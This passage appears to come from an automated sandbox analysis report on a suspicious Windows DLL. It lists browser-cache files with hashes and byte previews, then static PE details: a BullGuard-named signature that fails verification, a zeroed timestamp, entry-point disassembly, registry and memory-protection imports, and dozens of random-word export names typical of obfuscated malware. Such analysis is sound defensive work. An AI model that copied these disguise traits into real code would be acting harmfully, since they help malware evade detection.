                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otFlat[1].json
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):12588
                                                                                                                                                                                                                      Entropy (8bit):5.376121346695897
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
                                                                                                                                                                                                                      MD5:AF6480CC2AD894E536028F3FDB3633D7
                                                                                                                                                                                                                      SHA1:EA42290413E2E9E0B2647284C4BC03742C9F9048
                                                                                                                                                                                                                      SHA-256:CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
                                                                                                                                                                                                                      SHA-512:A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
                                                                                                                                                                                                                      Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otPcCenter[1].json
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):46394
                                                                                                                                                                                                                      Entropy (8bit):5.58113620851811
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
                                                                                                                                                                                                                      MD5:145CAF593D1A355E3ECD5450B51B1527
                                                                                                                                                                                                                      SHA1:18F98698FC79BA278C4853D0DF2AEE80F61E15A2
                                                                                                                                                                                                                      SHA-256:0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
                                                                                                                                                                                                                      SHA-512:D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
                                                                                                                                                                                                                      Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF3B007EC7DDA32009.TMP
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13557
                                                                                                                                                                                                                      Entropy (8bit):0.7647989985640417
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lob9lob9lWDsKjYtd4I:kBqoIciDsKyd4I
                                                                                                                                                                                                                      MD5:8E39924B934F5D32EB51E52C7556A6B8
                                                                                                                                                                                                                      SHA1:3BF23CD00347413D7C9B6240A805AFE34F9E49EE
                                                                                                                                                                                                                      SHA-256:ECC18F495B36765E6917CF2FCCBB1B01413BCCE9A574F55410B4C349A315704B
                                                                                                                                                                                                                      SHA-512:A4AE84E2E38FFDA508B45D10992102A5EF5637AC3AF3264B7D14283AAC56F44C25B7D9F5C3487C232DA3F3362E3B647A8F63A14A3E1FEA8997F2D71B1847EBD5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF89E991312CA73982.TMP
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):191008
                                                                                                                                                                                                                      Entropy (8bit):3.14764745670542
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:iiqZ/2Bfc6ru5rXfVStviqZ/2BfcJru5rXfVSt:jU
                                                                                                                                                                                                                      MD5:D07AFCACE607C65908183005B5FCE56E
                                                                                                                                                                                                                      SHA1:D71AAEF2BC15947E8DC7AF3B18CE7471E2B94523
                                                                                                                                                                                                                      SHA-256:383B615C229956961A8DB3631901E952848E0ED253BB6741C7F09613BA683E0D
                                                                                                                                                                                                                      SHA-512:E947238E2C2F56927F56FD69296AA3B057A6ADD2C5C5BF3BB794D776280A438D9767ED0833CB78F6994406B2DD30CD51B3DAA2518023A20D6768FCB29ECB1E9E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFB443F6DE1AC46DD7.TMP
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29989
                                                                                                                                                                                                                      Entropy (8bit):0.3297458050467388
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwta+99lwtay9l2taM/u:kBqoxKAuvScS+Fe2R+gRy
                                                                                                                                                                                                                      MD5:DF0D38916195590AAA587E8870C61C15
                                                                                                                                                                                                                      SHA1:F582B319232AD86573885CC5CB3D8BEA0B27363F
                                                                                                                                                                                                                      SHA-256:AD61493A280E688BA760B531E3A76C8F79B6060871D1C4342F6E68CDCA1D6E27
                                                                                                                                                                                                                      SHA-512:649E3D8DD7BAC26C9F1E72501135206648415E7D4F48B224B24154D5F4509DE5DC27F7F39AAA11880EC728AA6F8B8BA016AE51F5EC03184766E70329B0EF3186
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFCE66EAC1CE286863.TMP
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):39577
                                                                                                                                                                                                                      Entropy (8bit):0.5600255083155956
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:kBqoxKAuvScS+OIirXIXC5ItN2SSRlg5ItN2SSRlk5ItN2SSRl9:kBqoxKAuvScS+OIir4SCVTCVrCVQ
                                                                                                                                                                                                                      MD5:958B8B9C6433C22F2CEA4FE64CD909AB
                                                                                                                                                                                                                      SHA1:ECDE85D2BD55D249C5C0CB5A6514CD05DC382F6B
                                                                                                                                                                                                                      SHA-256:241C5F9FAFD853A8BFA174ABF7A455BDC97FF45CD4B158AA6B9832D41D2CB185
                                                                                                                                                                                                                      SHA-512:1F5244081CAB2728492C67D5DD477231380CE4316DE8E047D18B90E040E1219C478578CC1E12F694BC5B6219FBA362A53E838C89F99DCAA61673445DDCA70795
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PBI74ETAQTWW3GCNPOH4.temp
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):5149
                                                                                                                                                                                                                      Entropy (8bit):3.1843117091560997
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:kfudiaPSIGrC9GrIomAsASFZhudiaPSIGrh683GrIomAczkhudiaPSIGrx9GrIoF:kfkPSw9SGAJahkPSZ3SGArhkPS39SGAf
                                                                                                                                                                                                                      MD5:3C9F86519C17A38F9C4AE06B734F427C
                                                                                                                                                                                                                      SHA1:6151B9C4B49DD2A922FE6AD5A445BFE39B729BB9
                                                                                                                                                                                                                      SHA-256:1D05A1F63BAA0FB65B43B9CBD91E4992CC3ADB98DF21F4029AC5FF1C1670F5C0
                                                                                                                                                                                                                      SHA-512:C2A10D7B6F8FA54EF9371E696C7E54D4C5086825BCF35798AB9F787F1919D9C38354C1F27BFDE7EED9D2AFABD9854006DEB5E26543BB76B6A0ACB15DE9FD8B69
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: ...................................FL..................F.@.. .....@.>...".7\:.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.<..PROGRA~1..t......L.>Q.<....E...............J.....>.!.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.sQ.1..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JsQ.1.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............n......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                                      Entropy (8bit):6.238166165593431
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:0pz1on1.dll
                                                                                                                                                                                                                      File size:123224
                                                                                                                                                                                                                      MD5:3c4804307010574bc5c94c57ea8d3135
                                                                                                                                                                                                                      SHA1:52163b920bac82132f76d1bd8d1978fe5ab88667
                                                                                                                                                                                                                      SHA256:733cbecbe9469a90f40dc38448866df368238aac203fa9c986cd6b45d8057aa7
                                                                                                                                                                                                                      SHA512:207e1afcea308656ede7325edf8c52f507565ad2af3e8e99197a71d3ce05e40cf206cc0b76d82d09a02fd683a98847d17b50096ace97b6e498905dee87bbf1b2
                                                                                                                                                                                                                      SSDEEP:3072:ALWLssRhE314TpmVqlsqaQtdOWIYn/8QG:MsjE314tBiqaworY0z
                                                                                                                                                                                                                      File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.................[............@..........................0.......I.....................................

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Entrypoint:0x415b0b
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                      Import Hash:96db520e12bff14c77a0d245268e2a6a

                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                      Signature Issuer:CN=GlobalSign ObjectSign CA, OU=ObjectSign CA, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                      • 10/28/2010 11:07:17 AM 10/28/2013 10:07:14 AM
                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                      • CN=BullGuard Ltd., OU=IT, O=BullGuard Ltd., L=Heathrow, S=Middlesex, C=GB
                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                      Thumbprint MD5:42EBA92356035E4C51F36AEB1D76CB3E
                                                                                                                                                                                                                      Thumbprint SHA-1:41B772AFFAA52513FD8933ED22ECBD3F0671E738
                                                                                                                                                                                                                      Thumbprint SHA-256:4E4C1DCD8483FC63AE325A7E1943E8DFF224B3899D2C8327DE1C206E4F2BF1FB
                                                                                                                                                                                                                      Serial:0100000000012BF24A453E

                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                      sub esp, 1Ch
                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                      call dword ptr [0041A570h]
                                                                                                                                                                                                                      mov dword ptr [0041BC84h], eax
                                                                                                                                                                                                                      mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                      push 00000039h
                                                                                                                                                                                                                      push 0000005Ch
                                                                                                                                                                                                                      push 00000075h
                                                                                                                                                                                                                      call 00007F6DF492B063h
                                                                                                                                                                                                                      mov dword ptr [0041BC84h], eax
                                                                                                                                                                                                                      push dword ptr [0041BBF8h]
                                                                                                                                                                                                                      push dword ptr [0041BBF8h]
                                                                                                                                                                                                                      push FFFFFFFBh
                                                                                                                                                                                                                      push 00000031h
                                                                                                                                                                                                                      call 00007F6DF492EBC6h
                                                                                                                                                                                                                      add esp, 10h
                                                                                                                                                                                                                      mov ebx, eax
                                                                                                                                                                                                                      add ebx, 51h
                                                                                                                                                                                                                      sub ebx, dword ptr [0041BC50h]
                                                                                                                                                                                                                      xor ebx, FFFFFFC2h
                                                                                                                                                                                                                      sub ebx, dword ptr [0041BBF8h]
                                                                                                                                                                                                                      mov dword ptr [0041BC84h], ebx
                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                      call dword ptr [0041A50Ch]
                                                                                                                                                                                                                      mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007F6DF492B692h
                                                                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                      push dword ptr [0041BC50h]
                                                                                                                                                                                                                      push dword ptr [0041BC84h]
                                                                                                                                                                                                                      push 00000010h
                                                                                                                                                                                                                      push 0000000Fh
                                                                                                                                                                                                                      push 00000036h
                                                                                                                                                                                                                      push 0000006Ch
                                                                                                                                                                                                                      push dword ptr [0041BBF8h]
                                                                                                                                                                                                                      push 00000008h
                                                                                                                                                                                                                      call 00007F6DF492CC00h
                                                                                                                                                                                                                      mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                      mov ebx, ebx
                                                                                                                                                                                                                      mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                                                      push dword ptr [0041BBF8h]
                                                                                                                                                                                                                      push dword ptr [0041BC50h]
                                                                                                                                                                                                                      push 00000027h
                                                                                                                                                                                                                      push dword ptr [0041BC84h]
                                                                                                                                                                                                                      push 00000011h
                                                                                                                                                                                                                      push dword ptr [0041BC84h]
                                                                                                                                                                                                                      push 00000027h
                                                                                                                                                                                                                      call 00007F6DF492A55Ah
                                                                                                                                                                                                                      mov dword ptr [0041BC84h], eax
                                                                                                                                                                                                                      mov edi, C5C52D9Ch

                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1a3f40xaa2.text
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1a93c0x8c.text
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1c6000x1b58.text
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000x704.reloc
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1b2040xc4.text
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1a4f80xec.text
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                      .text0x10000x209590x1ae00False0.664235101744data6.1348954186IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .reloc0x220000x7040x800False0.78076171875data6.36491407329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                      advapi32.dllRegDeleteKeyA, RegEnumKeyA, RegOpenKeyExA, RegSetValueExA, RegCreateKeyExA, RegCloseKey
                                                                                                                                                                                                                      kernel32.dllWaitForSingleObject, InterlockedDecrement, InterlockedIncrement, SetUnhandledExceptionFilter, GetTickCount, TerminateProcess, InitializeCriticalSection, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, CreateEventA, QueryPerformanceCounter, GetLastError, DeleteCriticalSection, lstrlenA, IsBadReadPtr, GetCurrentProcess, DeviceIoControl, GetCurrentProcessId, IsBadWritePtr, GetVersionExA, UnhandledExceptionFilter, CloseHandle, GetCurrentThreadId, VirtualProtect
                                                                                                                                                                                                                      msdmo.dllMoInitMediaType, DMORegister, DMOUnregister, MoCopyMediaType, MoFreeMediaType
                                                                                                                                                                                                                      msvcrt.dllwcstombs, free, _purecall, floor, _vsnwprintf, _vsnprintf, _initterm, ceil, malloc, __CxxFrameHandler, wcslen, modf
                                                                                                                                                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, StringFromCLSID
                                                                                                                                                                                                                      user32.dllCreateWindowExW, SetWindowPos

                                                                                                                                                                                                                      Exports

                                                                                                                                                                                                                      NameOrdinalAddress
                                                                                                                                                                                                                      Fud10x414787
                                                                                                                                                                                                                      Incavate20x4147cc
                                                                                                                                                                                                                      Gynecide30x41481a
                                                                                                                                                                                                                      Discoplacental40x4148c3
                                                                                                                                                                                                                      Compend50x414917
                                                                                                                                                                                                                      Unamusing60x4149cd
                                                                                                                                                                                                                      Issei70x414ac8
                                                                                                                                                                                                                      Antizealot80x414b19
                                                                                                                                                                                                                      Reimprove90x414bc8
                                                                                                                                                                                                                      Mancipee100x414c1c
                                                                                                                                                                                                                      Vulpes110x414c62
                                                                                                                                                                                                                      Dehydrogenase120x414d2e
                                                                                                                                                                                                                      Isometropia130x414dfa
                                                                                                                                                                                                                      Polypi140x414e8d
                                                                                                                                                                                                                      Metallotherapy150x414ef4
                                                                                                                                                                                                                      Spiraloid160x414f3c
                                                                                                                                                                                                                      Dispiece170x414fb3
                                                                                                                                                                                                                      Piotine180x415072
                                                                                                                                                                                                                      Suspensively190x4150e2
                                                                                                                                                                                                                      Isanthous200x4151b2
                                                                                                                                                                                                                      Volutidae210x41523a
                                                                                                                                                                                                                      Styan220x415394
                                                                                                                                                                                                                      Implausibly230x4153f6
                                                                                                                                                                                                                      Perstringement240x415605
                                                                                                                                                                                                                      Creamcup250x415683
                                                                                                                                                                                                                      Haplomid260x4156d3
                                                                                                                                                                                                                      Necrobacillosis270x4157f8
                                                                                                                                                                                                                      Funambulate280x41587f
                                                                                                                                                                                                                      Unmundified290x4158de
                                                                                                                                                                                                                      Choosingly300x415904
                                                                                                                                                                                                                      Dorsothoracic310x415977
                                                                                                                                                                                                                      Unevil320x415a41
                                                                                                                                                                                                                      Unbeached330x415b0b
                                                                                                                                                                                                                      Uncongressional340x415bf2
                                                                                                                                                                                                                      Bouk350x415d3a
                                                                                                                                                                                                                      Provokable360x415d95
                                                                                                                                                                                                                      Karmouth370x415dc4
                                                                                                                                                                                                                      Serai380x415e80
                                                                                                                                                                                                                      Coanimate390x415f05
                                                                                                                                                                                                                      Ganocephalan400x4160f7
                                                                                                                                                                                                                      Gobstick410x41615b
                                                                                                                                                                                                                      DllUnregisterServer420x4161b4
                                                                                                                                                                                                                      Petaliferous430x4162a3
                                                                                                                                                                                                                      Lightningproof440x41637d
                                                                                                                                                                                                                      Songle450x4163a8
                                                                                                                                                                                                                      DllGetClassObject460x4163f2
                                                                                                                                                                                                                      Palmy470x416412
                                                                                                                                                                                                                      Undecatoic480x416457
                                                                                                                                                                                                                      Desonation490x416495
                                                                                                                                                                                                                      Valedictorily500x41652b
                                                                                                                                                                                                                      Amateurishness510x4165ad
                                                                                                                                                                                                                      Aport520x41665d
                                                                                                                                                                                                                      Erthly530x416689
                                                                                                                                                                                                                      Immaturely540x416701
                                                                                                                                                                                                                      Antibiont550x41673d
                                                                                                                                                                                                                      Thowt560x41679c
                                                                                                                                                                                                                      Papyrology570x4167c4
                                                                                                                                                                                                                      Isodialuric580x416836
                                                                                                                                                                                                                      Pneumolysis590x416883
                                                                                                                                                                                                                      Hermogenian600x416909
                                                                                                                                                                                                                      Keysmith610x416999
                                                                                                                                                                                                                      Orthopedical620x416a09
                                                                                                                                                                                                                      Forritsome630x416b14
                                                                                                                                                                                                                      Rheumatically640x416b92
                                                                                                                                                                                                                      Proser650x416c19
                                                                                                                                                                                                                      Platycephaloid660x416cfa
                                                                                                                                                                                                                      Unitize670x416e47
                                                                                                                                                                                                                      Hyaenodontoid680x416f92
                                                                                                                                                                                                                      Tastily690x416ff5
                                                                                                                                                                                                                      Ligniform700x417022
                                                                                                                                                                                                                      Informatively710x41727a
                                                                                                                                                                                                                      Murid720x4172e3
                                                                                                                                                                                                                      DllCanUnloadNow730x417362
                                                                                                                                                                                                                      Siphoneae740x4174d0
                                                                                                                                                                                                                      Secre750x41752e
                                                                                                                                                                                                                      Equidistribution760x417663
                                                                                                                                                                                                                      Circumlocute770x4176b1
                                                                                                                                                                                                                      Unrecordable780x417736
                                                                                                                                                                                                                      Kabyle790x41779c
                                                                                                                                                                                                                      Hypovanadic800x41780c
                                                                                                                                                                                                                      Brachydodrome810x4178c6
                                                                                                                                                                                                                      Diploneural820x4179bf
                                                                                                                                                                                                                      Tinctorially830x4179f7
                                                                                                                                                                                                                      Testudinata840x417a7f
                                                                                                                                                                                                                      Sangraal850x417ace
                                                                                                                                                                                                                      Convolvulus860x417b80
                                                                                                                                                                                                                      Besan870x417c8e
                                                                                                                                                                                                                      Synapterous880x417d23
                                                                                                                                                                                                                      Uncrisp890x417d67
                                                                                                                                                                                                                      Curstfully900x417dd8
                                                                                                                                                                                                                      Ependymal910x417e1a
                                                                                                                                                                                                                      Subjectile920x417e4f
                                                                                                                                                                                                                      Greedily930x417e98
                                                                                                                                                                                                                      DllRegisterServer940x417f00
                                                                                                                                                                                                                      Empicture950x417f32
                                                                                                                                                                                                                      Balbutient960x417fb5
                                                                                                                                                                                                                      Exsanguinous970x41810d
                                                                                                                                                                                                                      Podargue980x41815a
                                                                                                                                                                                                                      Syntheme990x4181e3
                                                                                                                                                                                                                      Stridden1000x418221
